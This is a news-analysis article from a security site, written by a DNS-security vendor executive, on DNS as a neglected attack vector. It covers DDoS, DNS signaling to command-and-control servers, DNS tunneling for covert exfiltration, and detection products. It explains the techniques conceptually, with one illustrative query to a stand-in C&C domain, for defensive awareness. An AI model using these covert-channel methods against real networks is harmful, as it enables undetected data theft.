Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Infrastructure Security

01:15 PM
Ashish Gupta
Ashish Gupta
News Analysis-Security Now

Closing Gaps in DNS

Everyone uses DNS. How can you prevent hackers from using it to disrupt your business?

Two of the most popular gateways in corporate networks are HTTP and DNS. For a long time, IT organizations have been protecting the IT infrastructure by providing firewalls, next-generation firewalls, web application firewalls, IDS/IPS solutions and application delivery controllers. Thus, while HTTP is a secure doorstep guarded with many locks and guarded around the clock, DNS is the neglected back door. Thieves don’t care. They want the easiest way in, and in most companies, DNS provides that because it is unfortunately ignored as a threat vector.

Even so, the topic of DNS security has recently become more prominent, especially in the wake of a large-scale Distributed Denial of Service (DDoS) attacks on the DNS provider Dyn, now an Oracle company. The October 2016 attack claimed several million endpoints. It also temporarily took down a variety of websites and cloud services such as Twitter that rely on Dyn for the resolution of the IP addresses. And more recently with the Ransomware attacks like Wannacry and Jaff attacks that both utilized DNS as well to complete the attack chain.

These incidents showed the vulnerability of the "Internet Address Book" for DDoS and potential Ransomware attacks. For this reason, companies are advised to operate their own local DNS server, secondary DNS servers at their service provider as well as an optional DNS hosting provider such as Dyn.

DNS as an attack vector
The domain name system is virtually an overlay network on the public Internet and private corporate networks. The problem is even if one is aware of the vulnerability of the DNS, one cannot simply close, for example, port 53 through a firewall rule just as much as one could pinpoint the HTTP port 80.

The possibilities of DNS abuse are much more diverse than the approach of paralyzing the DNS server by flooding it with DDoS requests, as was the case for Dyn. More sophisticated attack variants include Botnet-based brute-force attacks through Distributed Reflection DoS in combination with DNS amplification and the malicious redirection of DNS queries using DNS hijacking or DNS cache poisoning. The 2016 Cisco Annual Security report found that 91.3% of malware targets DNS in attacks.

Using DNS queries for attacks
There are two tricky and rarely noticed methods of using DNS for attacks on corporate networks: DNS signaling and DNS tunneling. DNS signaling attacks
Suppose a CFO goes to an Internet cafe, logs on to the Internet and inadvertently picks up some malware, compromising his corporate PC. In that case, the malware can use DNS signaling to communicate with its Command and Control (C&C) server and potentially start exfilitrating critical data or simply encrypting it to create a Ransomware situation on the CFO’s data. This is something Wannacry did for the National Health System in the UK.

An attacker must set up only one name server, which is accessible through the Internet. A basic installation of the open source DNS server BIND is running on the server, and the logging of requests is activated. Malware, which has reached its target network, for example, sends a DNS request to the name server of the C&C domain with the content: Company-infiltration.c-c-server.com.

A professional malware programmer would obviously obfuscate this message so that instead of the phrase "success-compliant," only a long, cryptic string would be read. The domain of the attacker -- in the example "c-c-server.com" -- can be specified hard-coded in the malware. But there is also malicious software, which for this purpose brings along a Domain Generation Algorithm (DGA).

The DNS resolver of the malware-infected company redirects the message to the authoritative name server of the attacker. Finally, it seems to be just a request for a somewhat cumbersome subdomain in the domain c-c-server.com. On the attacker's side, the message is then decrypted.

Now, the attacker has established a cloaked communication channel that appears as harmless DNS queries and remains under the radar of many firewalls and many next-generation firewalls (NGFWs) as well as intrusion detection and intrusion prevention solutions (IDS/IPS). What is the harm here? Data exfiltration at the least. Now, the CFO’s computer is sharing data without the CFO knowing it.

Many security solutions don’t provide a view of the DNS attack vector. In addition, if the malware obtains admin rights on the compromised computer, it can change the recursive DNS server of the terminal and replace it with an alternative, for example, through Google DNS or OpenDNS by establishing a group policy (note, IT can prevent this but often don’t). In this case, the affected company's DNS server does not even know about the suspicious DNS data exchange.

DNS-tunnel attack vector
DNS signaling mechanisms allows attackers to use DNS queries to transport other protocols such as HTTP, FTP or SMTP encrypted through DNS sessions. The attackers esentially build a VPN, except that they use DNS as a transfer protocol to conceal the VPN structure.

Once attackers have established a DNS-based VPN, they can open up all the possibilities of a private tunnel. They can use FTP to inject the code for remote access trojans (RATs) into the corporate network or use the tunnel for data exfiltration from the company. Usually, that can all be done without having to worry about firewall rules, IDS/IPS signatures or behavior-based network monitoring.

This creative use of DNS is particularly suitable for advanced persistent threats (APTs) on companies. In an APT, the cybercriminals do not simply want to compromise any network but have a concrete goal in mind, for example, the design plans or the product roadmap of a manufacturing company. Once the desired data is found, the attacker can exfiltrate the data in a quiet manner, called "low and slow" or "slow drip." This does not even result in load peaks in the network traffic, which could be noticed by a network monitoring solution independent of the ports.

Measures against DNS abuse
A new generation of solutions for the defense of DNS-based attacks has emerged called "Advanced DNS Protection." These solutions combine DNS firewalling and DNS monitoring with sophisticated analytics mechanisms such as DNS Deep Packet Inspection and automated measures to prevent DNS abuse as quickly and effectively as possible.

As soon as a certain scoring value of suspicious behavior is reached, the solutions can not only trigger an alarm but actively intervene, for example, answer a suspicious DNS query with "NXDOMAIN" or immediately stop a detected ongoing data exfiltration. The solutions complement the existing defense landscape by adding an important building block. For this reason, they have to work with APIs, next-generation firewalls as well as with SIEM systems or incident response tools.

No more blinders
IT organizations have so far put too much emphasis on the prominent attack vector HTTP in the protection of their networks. The front door has been protected, reinforced and guarded with all available means, but the back door DNS is not even locked. It often serves as a comfortable "staff access" that unwanted visitors are also using. In particular, DNS tunneling has established itself as a long-neglected and, for this reason, extremely effective way for the introduction of malware and the exfiltration of company-internal data. It is high time to close this backdoor. Attackers are surprisingly flexible in the choice of the access route and far too successful. That means organizations have to be as intelligent and proactive with DNS as they are in protecting the front entrance.

Related posts:

As EVP and CMO at Infoblox, Ashish Gupta drives strategy for global corporate and product marketing at Infoblox. Previously, he held leadership positions at Action, Vidyo, Microsoft, Alcatel/Genesys Telecommunications, Telera, Deloitte Consulting and Hewlett-Packard.

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
I Smell a RAT! New Cybersecurity Threats for the Crypto Industry
David Trepp, Partner, IT Assurance with accounting and advisory firm BPM LLP,  7/9/2021
Attacks on Kaseya Servers Led to Ransomware in Less Than 2 Hours
Robert Lemos, Contributing Writer,  7/7/2021
It's in the Game (but It Shouldn't Be)
Tal Memran, Cybersecurity Expert, CYE,  7/9/2021
Register for Dark Reading Newsletters
White Papers
Current Issue
How Data Breaches Affect the Enterprise
Data breaches continue to cause negative outcomes for companies worldwide. However, many organizations report that major impacts have declined significantly compared with a year ago, suggesting that many have gotten better at containing breach fallout. Download Dark Reading's Report "How Data Breaches Affect the Enterprise" to delve more into this timely topic.
Flash Poll
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2021-11-30
Insufficient Input Validation in Web Applications operating on Business-DNA Solutions GmbH’s TopEase® Platform Version <= 7.1.27 on an object’s attributes with numeric...
PUBLISHED: 2021-11-30
Unrestricted File Upload in Web Applications operating on Business-DNA Solutions GmbH’s TopEase® Platform Version <= 7.1.27 in the File Upload Functions allows an authenticated remote attacker with Upload privileges to ...
PUBLISHED: 2021-11-30
Missing Rate Limiting in Web Applications operating on Business-DNA Solutions GmbH’s TopEase® Platform Version <= 7.1.27 on the Login Form allows an unauthenticated remote attacker to perform multiple login attempts, wh...
PUBLISHED: 2021-11-30
An insufficient session expiration vulnerability exists in Business-DNA Solutions GmbH’s TopEase® Platform Version <= 7.1.27, which allows a remote attacker to reuse, spoof, or steal other user and admin sessions.
PUBLISHED: 2021-11-30
Trend Micro Antivirus for Mac 2021 v11 (Consumer) is vulnerable to an improper access control privilege escalation vulnerability that could allow an attacker to establish a connection that could lead to full local privilege escalation within the application. Please note that an attacker must first o...